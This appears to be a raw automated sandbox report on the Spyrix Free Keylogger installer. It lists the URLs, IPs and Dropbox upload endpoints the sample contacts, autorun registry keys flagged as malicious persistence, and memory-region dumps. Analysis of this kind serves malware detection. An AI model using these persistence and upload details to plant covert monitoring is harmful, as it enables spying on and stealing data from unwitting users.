http://www.spyrix.com/pro_upgrade.htm?lic=
unknown
http://crl.certum.pl/ca.crl0:
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.e5
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
unknown
https://spyrix.net/dashboard/prg-actions
158.69.117.119
https://dashboard.spyrix.com/cdn.js
158.69.117.119
http://www.myspace.com/search/
unknown
https://api.dropbox.com/1/fileops/create_folder?
unknown
https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js
95.181.182.182
https://www.spyrix.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://spyrix.net/dashboard/prg-actionsll
unknown
http://www.innosetup.com/
unknown
https://spyrix.net/dashboard/prg-actionsin
unknown
https://spyrix.net/dashboard/proxy/upload
unknown
https://swtb-download.spyrix-sfk.com/download
unknown
https://api.dropbox.com/1/shares/dropbox
unknown
HTTPS://DASHBOARD.SPYRIX.COM/
unknown
https://spyrix.net/dashboard/prg-actionsubertlS
unknown
https://api-content.dropbox.com/1/files/dropbox
unknown
http://crl.ver)
unknown
https://cdn.cdndownload.net/dashboard30/assets/Modal-04ffda94.css
95.181.182.182
https://api-content.dropbox.com/1/files_put
unknown
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
23.109.93.100
https://api.dropbox.com/1/oauth/request_token?
unknown
https://dashboard.spyrix.com/.spyrix.com/qqS
unknown
HTTPS://SPYRIX.NET/DASHBOARD/PRG-ACTIONS
unknown
https://cdn.cdndownload.net/dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js
95.181.182.182
https://spyrix.net/das
unknown
https://api.dropbox.com/1/metadata/sandbox
unknown
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/
unknown
https://spyrix.net/usr/monitor/access.txt
unknown
http://www.actualkeylogger.com/help.html#registrate
unknown
http://www.ok.ru/dk?st.cmd=searchResult
unknown
http://repository.certum.pl/l3.cer0
unknown
https://api.dropbox.com/1/fileops/create_folder
unknown
https://cdn.cdndownload.net/dashboard30/assets/Nunito-Regular-73dcaa51.woff2
95.181.182.182
https://swtb-download.spyrix-sfk.com/C
unknown
https://cdn.cdndownload.net/dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js
95.181.182.182
http://html4/loose.dtd
unknown
https://spyrix.net/dashboard/prg-actions//swtb-
unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
unknown
http://neftali.clubdelphi.com/
unknown
http://.css
unknown
https://filedn.com
unknown
https://cdn.cdndownload.net/dashboard30/assets/ButtonTemplate.module-c837805f.js
95.181.182.182
https://api.dropbox.com/1/fileops/copy?
unknown
https://spyrix.net/dashboard/prg-actionsuu7
unknown
https://cdn.cdndownload.net/dashboard30/assets/Button-ca236c00.css
95.181.182.182
https://dashboard.actualkeylogger.com
unknown
https://swtb-download.spyrix-sfk.com/f
unknown
http://vk.com/search
unknown
https://cdn.cdndownload.net/dashboard30/assets/en-5393c481.js
95.181.182.182
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe&bd
unknown
https://spyrix.net/dashboard/prg-actionsive#
unknown
http://vk.com/searchecp
unknown
http://www.actualkeylogger.com/buynow.html
unknown
http://.jpg
unknown
https://api.dropbox.com/1/fileops/move
unknown
https://cdn.cdndownload.net/dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js
95.181.182.182
https://cdnbaynet.com/loader/link.php?prg_id=sfk77
unknown
http://www.actualkeylogger.com/help.htmlhttp://spyrix.com/manual.phpU
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfk&A
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeXsC
unknown
https://securcdn.com/loader/link.php?prg_id=sfkupowershell.exe
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeG
unknown
https://cdn.cdndownload.net/dashboard30/assets/Button.module-6d4e91b8.js
95.181.182.182
https://cdn.cdndownload.net/dashboard30/assets/ButtonText-ead06ca1.css
95.181.182.182
https://www.certum.pl/CPS0
unknown
https://api-content.dropbox.com/1/chunked_upload
unknown
https://www.dropbox.com/1/oauth/authorize?oauth_token=open
unknown
https://spyrix.net/dashboard/prg-actionsuu
unknown
https://spyrix.net/dashboard/prg-actionsG
unknown
http://www.dk-soft.org/
unknown
https://cdn.cdndownload.net/dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js
95.181.182.182
http://filedn.com
unknown
https://g.live.com/odclientsettings/Prod/C:
unknown
https://api.dropbox.com/1/fileops/move?
unknown
https://spyrix.net/dashboard/prg-actionsOMEPATH-
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeN
unknown
https://api.dropbox.com/1/account/info
unknown
https://spyrix.net/usr/monitor/iorder.php?comp_id=
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfk8A
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exec
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0
unknown
http://schemas.mic
unknown
https://www.spyrix.com/purchase.php?prg=sfk
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
swtb-download.spyrix-sfk.com
167.114.14.168
spyrix.net
158.69.117.119
dashboard.spyrix.com
158.69.117.119
www.google.com
142.250.181.228
filedn.com
23.109.93.100
cl-e0469d03.edgecdn.ru
95.181.182.182
cdnbaynet.com
167.114.14.170
cdn.cdndownload.net
unknown

IPs

IP
Domain
Country
Malicious
192.168.2.8
unknown
unknown
167.114.14.168
swtb-download.spyrix-sfk.com
Canada
239.255.255.250
unknown
Reserved
158.69.117.119
spyrix.net
Canada
142.250.181.228
www.google.com
United States
167.114.14.170
cdnbaynet.com
Canada
95.181.182.182
cl-e0469d03.edgecdn.ru
Russian Federation
127.0.0.1
unknown
unknown
23.109.93.100
filedn.com
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
localSPM
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
localmon
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\EnumKreg\value
tid
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
kbdsprt
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
localSPM
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: Setup Version
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: App Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
InstallLocation
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: Icon Group
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: User
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: Language
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
QuietUninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
NoModify
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
NoRepair
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
InstallDate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
MajorVersion
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
MinorVersion
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
VersionMajor
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
VersionMinor
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
EstimatedSize
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
Version
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{FBF23B40-E3F0-101B-8488-00AA003E56F8} {000214E4-0000-0000-C000-000000000046} 0xFFFF
There are 39 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3279000
heap
page read and write
C50000
heap
page read and write
A84000
heap
page read and write
4190000
direct allocation
page execute and read and write
36EA000
direct allocation
page read and write
2AAF000
heap
page read and write
1F03FED0000
heap
page read and write
8130000
trusted library allocation
page read and write
33CE000
direct allocation
page execute and read and write
27405470000
trusted library allocation
page read and write
77E000
heap
page read and write
2C2E000
stack
page read and write
8E4000
unkown
page execute and write copy
274055F0000
remote allocation
page read and write
3B40000
direct allocation
page execute and read and write
324A000
heap
page read and write
10F0000
heap
page read and write
29C1000
heap
page read and write
8370000
direct allocation
page execute and read and write
2081000
direct allocation
page read and write
29AE000
heap
page read and write
4300000
direct allocation
page execute and read and write
869000
unkown
page execute and write copy
29A0000
heap
page read and write
31EB000
heap
page read and write
2FC0000
heap
page read and write
3F70000
direct allocation
page execute and read and write
2D00000
heap
page read and write
DD0000
heap
page read and write
5F2000
unkown
page readonly
31C4000
heap
page read and write
1CE89194000
heap
page read and write
34B5000
heap
page read and write
448F000
stack
page read and write
4ED4000
trusted library allocation
page read and write
2B09000
heap
page read and write
3268000
heap
page read and write
758000
heap
page read and write
23AF000
direct allocation
page read and write
A84000
heap
page read and write
A84000
heap
page read and write
34C7000
heap
page read and write
586000
heap
page read and write
26C7000
direct allocation
page read and write
C3E000
stack
page read and write
3408000
direct allocation
page read and write
2AE1000
heap
page read and write
2740568F000
heap
page read and write
3260000
heap
page read and write
31E5000
heap
page read and write
790000
heap
page read and write
2308000
direct allocation
page read and write
6787000
heap
page read and write
A84000
heap
page read and write
274056C3000
heap
page read and write
8130000
trusted library allocation
page read and write
274056E2000
heap
page read and write
17E1000
heap
page read and write
39DF000
stack
page read and write
777B000
heap
page read and write
2ADB000
heap
page read and write
3905000
heap
page read and write
111D000
trusted library allocation
page execute and read and write
F67000
heap
page read and write
71E000
heap
page read and write
12D000
stack
page read and write
7E20000
trusted library allocation
page read and write
2BBF000
stack
page read and write
F30000
heap
page read and write
E24000
heap
page read and write
503E000
stack
page read and write
1CE891AC000
heap
page read and write
A84000
heap
page read and write
2B09000
heap
page read and write
31C4000
heap
page read and write
78E000
heap
page read and write
2200000
heap
page read and write
3242000
heap
page read and write
8130000
trusted library allocation
page read and write
3D10000
direct allocation
page execute and read and write
A84000
heap
page read and write
42A0000
direct allocation
page execute and read and write
34BA000
heap
page read and write
7F4000
heap
page read and write
36E0000
direct allocation
page execute and read and write
4F83000
heap
page read and write
A84000
heap
page read and write
5900000
trusted library allocation
page execute and read and write
17A0000
heap
page read and write
22A5000
heap
page read and write
767000
heap
page read and write
A84000
heap
page read and write
31AB000
heap
page read and write
7AC000
heap
page read and write
14B0000
heap
page read and write
C2E000
stack
page read and write
2AEB000
heap
page read and write
17A9000
heap
page read and write
31DB000
heap
page read and write
450000
heap
page read and write
31C4000
heap
page read and write
2AEB000
heap
page read and write
8130000
trusted library allocation
page read and write
7F4000
heap
page read and write
29CB000
heap
page read and write
67A3000
heap
page read and write
2993000
heap
page read and write
174000
stack
page read and write
7F4000
heap
page read and write
2F1C000
stack
page read and write
7FD50000
direct allocation
page read and write
30A8000
trusted library allocation
page read and write
E1E000
heap
page read and write
41D0000
direct allocation
page execute and read and write
3390000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
2DBD000
trusted library allocation
page read and write
3EB0000
direct allocation
page execute and read and write
3EF1000
trusted library allocation
page read and write
3490000
direct allocation
page read and write
45C3000
direct allocation
page read and write
E34000
heap
page read and write
27405540000
trusted library allocation
page read and write
18DB000
heap
page read and write
8130000
trusted library allocation
page read and write
27405700000
heap
page read and write
159000
stack
page read and write
892EF7E000
unkown
page readonly
2D8D000
heap
page read and write
17E5000
heap
page read and write
7F4000
heap
page read and write
3A40000
direct allocation
page execute and read and write
400000
unkown
page readonly
2D90000
trusted library allocation
page read and write
31C4000
heap
page read and write
274056C1000
heap
page read and write
34DC000
direct allocation
page read and write
865000
unkown
page execute and write copy
766000
heap
page read and write
4150000
direct allocation
page execute and read and write
1B89000
heap
page read and write
7FDF0000
direct allocation
page read and write
27400D40000
trusted library allocation
page read and write
2F60000
heap
page read and write
4F79000
heap
page read and write
3227000
heap
page read and write
7B3000
heap
page read and write
237C000
direct allocation
page read and write
2FD0000
heap
page read and write
3BB0000
direct allocation
page execute and read and write
31C4000
heap
page read and write
A6AE000
stack
page read and write
346C000
direct allocation
page read and write
1205000
heap
page read and write
3400000
direct allocation
page execute and read and write
27400000000
heap
page read and write
A84000
heap
page read and write
8130000
trusted library allocation
page read and write
2B20000
remote allocation
page read and write
2F9E000
stack
page read and write
31CE000
heap
page read and write
36B0000
direct allocation
page read and write
31C4000
heap
page read and write
2980000
heap
page read and write
A3D000
stack
page read and write
7FE20000
direct allocation
page read and write
7E0000
heap
page read and write
22729B97000
heap
page read and write
E23000
heap
page read and write
14CE000
stack
page read and write
2B20000
remote allocation
page read and write
BDF000
stack
page read and write
FEE000
stack
page read and write
A84000
heap
page read and write
31C4000
heap
page read and write
125D000
stack
page read and write
29C1000
heap
page read and write
8130000
trusted library allocation
page read and write
502000
unkown
page write copy
274055F0000
remote allocation
page read and write
704000
heap
page read and write
750000
heap
page read and write
8130000
trusted library allocation
page read and write
BE6000
heap
page read and write
5EE000
unkown
page write copy
6BB000
unkown
page readonly
3A70000
direct allocation
page execute and read and write
3740000
direct allocation
page execute and read and write
361000
unkown
page execute read
6885000
heap
page read and write
4210000
direct allocation
page execute and read and write
7D0000
heap
page read and write
5400000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
2D10000
heap
page read and write
7FE15000
direct allocation
page read and write
97DE000
stack
page read and write
34B9000
heap
page read and write
E14000
heap
page read and write
36DC000
direct allocation
page read and write
31E5000
heap
page read and write
D8E000
stack
page read and write
6A70000
direct allocation
page read and write
29CB000
heap
page read and write
34EF000
stack
page read and write
10FD000
heap
page read and write
383E000
stack
page read and write
1113000
trusted library allocation
page execute and read and write
3305000
direct allocation
page read and write
4090000
direct allocation
page execute and read and write
98E000
stack
page read and write
E3B000
heap
page read and write
53A0000
heap
page read and write
4420000
direct allocation
page execute and read and write
1CE89185000
heap
page read and write
A84000
heap
page read and write
61E88000
unkown
page read and write
230F000
direct allocation
page read and write
4EAC4CD000
stack
page read and write
10F9000
heap
page read and write
8130000
trusted library allocation
page read and write
3D50000
direct allocation
page execute and read and write
42E0000
direct allocation
page execute and read and write
2740562C000
heap
page read and write
3540000
heap
page read and write
A84000
heap
page read and write
24F0000
heap
page read and write
21FE000
stack
page read and write
31C4000
heap
page read and write
3640000
direct allocation
page execute and read and write
E54000
heap
page read and write
3281000
heap
page read and write
500000
unkown
page execute read
17E9000
heap
page read and write
6782000
heap
page read and write
A84000
heap
page read and write
780000
heap
page read and write
E1F000
heap
page read and write
1123000
trusted library allocation
page read and write
6B7000
unkown
page write copy
8130000
trusted library allocation
page read and write
3321000
direct allocation
page read and write
770000
heap
page read and write
33D0000
direct allocation
page execute and read and write
34C1000
heap
page read and write
2740564C000
heap
page read and write
4360000
direct allocation
page execute and read and write
35C0000
direct allocation
page execute and read and write
7AC000
heap
page read and write
96E000
heap
page read and write
2CD8000
heap
page read and write
37AA000
heap
page read and write
31DA000
heap
page read and write
8130000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
892FD7E000
unkown
page readonly
400000
unkown
page readonly
4DAE000
heap
page read and write
F40000
heap
page read and write
2989000
heap
page read and write
4FE0000
heap
page read and write
31B3000
heap
page read and write
8160000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
41E0000
direct allocation
page execute and read and write
863000
unkown
page execute and read and write
4FE8000
heap
page read and write
7FE11000
direct allocation
page read and write
53C0000
trusted library allocation
page execute and read and write
A84000
heap
page read and write
791F000
stack
page read and write
8184000
trusted library allocation
page read and write
7701000
direct allocation
page read and write
5EE000
unkown
page read and write
4FE7000
heap
page read and write
2DB1000
trusted library allocation
page read and write
7A50000
heap
page read and write
26DC000
direct allocation
page read and write
34BE000
heap
page read and write
33FE000
stack
page read and write
24A0000
direct allocation
page read and write
4FED000
stack
page read and write
6CD000
stack
page read and write
2D50000
heap
page read and write
E3F000
heap
page read and write
7B2000
heap
page read and write
8130000
trusted library allocation
page read and write
2A8F000
stack
page read and write
4EB0000
trusted library allocation
page read and write
4B8E000
stack
page read and write
56DB000
stack
page read and write
3D00000
direct allocation
page execute and read and write
13CE000
stack
page read and write
351E000
stack
page read and write
38F0000
direct allocation
page execute and read and write
1CE892D0000
heap
page read and write
D2F000
stack
page read and write
2AE5000
heap
page read and write
2AEC000
heap
page read and write
6520000
direct allocation
page read and write
450000
heap
page read and write
A8ED000
stack
page read and write
78B000
heap
page read and write
892F17E000
unkown
page readonly
A84000
heap
page read and write
15B0000
heap
page read and write
2DF0000
heap
page read and write
361000
unkown
page execute read
678A000
heap
page read and write
105C000
stack
page read and write
A84000
heap
page read and write
E39000
heap
page read and write
35A0000
direct allocation
page execute and read and write
A84000
heap
page read and write
2CC0000
trusted library allocation
page read and write
29BB000
heap
page read and write
360000
unkown
page readonly
2FDE000
stack
page read and write
3242000
heap
page read and write
31C4000
heap
page read and write
3680000
direct allocation
page execute and read and write
2D39000
heap
page read and write
8790000
trusted library allocation
page read and write
31C4000
heap
page read and write
27400902000
heap
page read and write
34A3000
heap
page read and write
17F9000
heap
page read and write
7F4000
heap
page read and write
2400000
heap
page read and write
76D0000
direct allocation
page read and write
33C6000
heap
page read and write
6B6000
unkown
page read and write
951E000
stack
page read and write
3496000
direct allocation
page read and write
96D000
heap
page read and write
1212000
heap
page read and write
20A0000
direct allocation
page read and write
31C4000
heap
page read and write
3FC0000
direct allocation
page execute and read and write
985E000
stack
page read and write
3FD000
stack
page read and write
6B6000
unkown
page write copy
1E7000
heap
page read and write
38F9000
heap
page read and write
31C4000
heap
page read and write
17AF000
heap
page read and write
7F4000
heap
page read and write
2CF1000
heap
page read and write
2D30000
heap
page read and write
2A00000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
2FF0000
heap
page read and write
76F11FF000
stack
page read and write
3E80000
direct allocation
page execute and read and write
F72FCC000
stack
page read and write
A84000
heap
page read and write
23DA000
direct allocation
page read and write
20AF000
direct allocation
page read and write
A80000
heap
page read and write
587000
heap
page read and write
3210000
direct allocation
page execute and read and write
31C4000
heap
page read and write
1CE891EE000
heap
page read and write
890000
unkown
page execute and read and write
31EB000
heap
page read and write
2B00000
heap
page read and write
A84000
heap
page read and write
31CE000
heap
page read and write
7FE10000
direct allocation
page read and write
17E5000
heap
page read and write
9EA000
unkown
page execute and read and write
8EC0000
heap
page execute and read and write
2348000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
3270000
heap
page read and write
BFD000
stack
page read and write
2FA0000
heap
page read and write
7F4000
heap
page read and write
2D44000
heap
page read and write
51AF000
stack
page read and write
6BA000
unkown
page write copy
4F1F000
heap
page read and write
8FE000
stack
page read and write
709000
heap
page read and write
2AE5000
heap
page read and write
643F000
stack
page read and write
2B64000
heap
page read and write
1100000
trusted library allocation
page read and write
2099000
direct allocation
page read and write
31C4000
heap
page read and write
8130000
trusted library allocation
page read and write
7646000
direct allocation
page read and write
2994000
heap
page read and write
A84000
heap
page read and write
4902000
direct allocation
page read and write
1F03FEA0000
heap
page read and write
2B3B000
heap
page read and write
3960000
direct allocation
page execute and read and write
A84000
heap
page read and write
559E000
stack
page read and write
31C4000
heap
page read and write
27401040000
trusted library section
page readonly
C40000
heap
page read and write
FAE000
stack
page read and write
4F02000
heap
page read and write
2AAB000
heap
page read and write
E2F000
heap
page read and write
1B6F000
stack
page read and write
4370000
direct allocation
page execute and read and write
20B6000
direct allocation
page read and write
361000
unkown
page execute read
334F000
stack
page read and write
99CE000
stack
page read and write
570000
heap
page read and write
3600000
direct allocation
page execute and read and write
684A000
heap
page read and write
4FB0000
heap
page read and write
2CAC000
stack
page read and write
3860000
direct allocation
page execute and read and write
77B5000
heap
page read and write
2B4B000
heap
page read and write
3B20000
direct allocation
page execute and read and write
4F75000
heap
page read and write
17F1000
heap
page read and write
3340000
direct allocation
page execute and read and write
E00000
heap
page read and write
7FE38000
direct allocation
page read and write
52AF000
stack
page read and write
3670000
direct allocation
page execute and read and write
1E7000
heap
page read and write
1FB0000
direct allocation
page read and write
268D000
direct allocation
page read and write
38FD000
heap
page read and write
652A000
direct allocation
page read and write
4F00000
trusted library allocation
page read and write
12BF000
heap
page read and write
79B000
stack
page read and write
4F1F000
heap
page read and write
E25000
heap
page read and write
C40000
heap
page read and write
3A50000
direct allocation
page execute and read and write
34A7000
heap
page read and write
892ED7E000
unkown
page readonly
892E97E000
unkown
page readonly
31C4000
heap
page read and write
7270000
trusted library allocation
page read and write
2D65000
heap
page read and write
457B000
direct allocation
page read and write
7FD49000
direct allocation
page read and write
401000
unkown
page execute read
7FC50000
direct allocation
page read and write
3910000
direct allocation
page execute and read and write
2C70000
heap
page read and write
22729B10000
heap
page read and write
506000
unkown
page read and write
8130000
trusted library allocation
page read and write
75BC000
stack
page read and write
9B5D000
stack
page read and write
360000
unkown
page readonly
1000000
heap
page read and write
232C000
direct allocation
page read and write
4F1F000
heap
page read and write
A84000
heap
page read and write
7820000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
13FD000
stack
page read and write
7F4000
heap
page read and write
38F5000
heap
page read and write
940000
heap
page read and write
31E5000
heap
page read and write
327F000
stack
page read and write
41B0000
direct allocation
page execute and read and write
2DAE000
trusted library allocation
page read and write
3BA0000
direct allocation
page execute and read and write
38F9000
heap
page read and write
31EB000
heap
page read and write
3AB0000
direct allocation
page execute and read and write
4F75000
heap
page read and write
8160000
trusted library allocation
page read and write
600000
heap
page read and write
226F000
direct allocation
page read and write
3EF9000
trusted library allocation
page read and write
550000
heap
page read and write
9C5E000
stack
page read and write
2AB4000
heap
page read and write
3C50000
direct allocation
page execute and read and write
7FD1C000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
3240000
heap
page read and write
51EE000
stack
page read and write
8130000
trusted library allocation
page read and write
D30000
heap
page read and write
892EC7B000
stack
page read and write
8130000
trusted library allocation
page read and write
3D90000
direct allocation
page execute and read and write
F5A000
heap
page read and write
17D1000
heap
page read and write
31C4000
heap
page read and write
965F000
stack
page read and write
274055C0000
trusted library allocation
page read and write
A84000
heap
page read and write
775F000
heap
page read and write
31C4000
heap
page read and write
31D0000
trusted library allocation
page read and write
72A000
heap
page read and write
73A000
heap
page read and write
702000
heap
page read and write
298B000
heap
page read and write
29BA000
heap
page read and write
37A3000
heap
page read and write
31E1000
heap
page read and write
2316000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
23D0000
heap
page read and write
34B6000
heap
page read and write
37A2000
heap
page read and write
3250000
heap
page read and write
3277000
heap
page read and write
274000FF000
heap
page read and write
A84000
heap
page read and write
892F1FE000
stack
page read and write
31C4000
heap
page read and write
75E0000
direct allocation
page read and write
6C0000
heap
page read and write
4140000
direct allocation
page execute and read and write
892F07E000
unkown
page readonly
7E6000
heap
page read and write
2DE0000
heap
page execute and read and write
8790000
trusted library allocation
page read and write
1E7000
heap
page read and write
BA9000
stack
page read and write
6B73000
direct allocation
page read and write
2C3F000
stack
page read and write
31B0000
heap
page read and write
513000
unkown
page readonly
1160000
trusted library allocation
page read and write
3FD0000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
79FD000
stack
page read and write
2281000
direct allocation
page read and write
274055D0000
trusted library allocation
page read and write
44A0000
direct allocation
page read and write
7F4000
heap
page read and write
777F000
heap
page read and write
7CC000
heap
page read and write
E39000
heap
page read and write
61E00000
unkown
page readonly
38F6000
heap
page read and write
3000000
trusted library allocation
page read and write
4CCE000
stack
page read and write
A84000
heap
page read and write
5A1000
unkown
page write copy
2D8D000
heap
page read and write
695E000
stack
page read and write
A84000
heap
page read and write
772000
heap
page read and write
750000
heap
page read and write
314E000
stack
page read and write
804000
heap
page read and write
17E1000
heap
page read and write
31B4000
heap
page read and write
1CE891D4000
heap
page read and write
22729B20000
heap
page read and write
1CE891B5000
heap
page read and write
36F0000
direct allocation
page execute and read and write
7FD42000
direct allocation
page read and write
3ED0000
direct allocation
page execute and read and write
412000
unkown
page write copy
32A0000
heap
page read and write
31AC000
heap
page read and write
892FB7E000
unkown
page readonly
6771000
heap
page read and write
17DA000
heap
page read and write
1A2F000
stack
page read and write
59C0000
trusted library allocation
page read and write
3630000
direct allocation
page execute and read and write
31C4000
heap
page read and write
3900000
heap
page read and write
4EE0000
trusted library allocation
page read and write
334E000
stack
page read and write
17B4000
heap
page read and write
A84000
heap
page read and write
4FE7000
heap
page read and write
3AA0000
direct allocation
page execute and read and write
C3E000
stack
page read and write
E2C000
heap
page read and write
31C4000
heap
page read and write
3E20000
direct allocation
page execute and read and write
975000
heap
page read and write
3570000
direct allocation
page execute and read and write
1698000
heap
page read and write
38C0000
direct allocation
page execute and read and write
4F1F000
heap
page read and write
7F4000
heap
page read and write
2800000
heap
page read and write
1843000
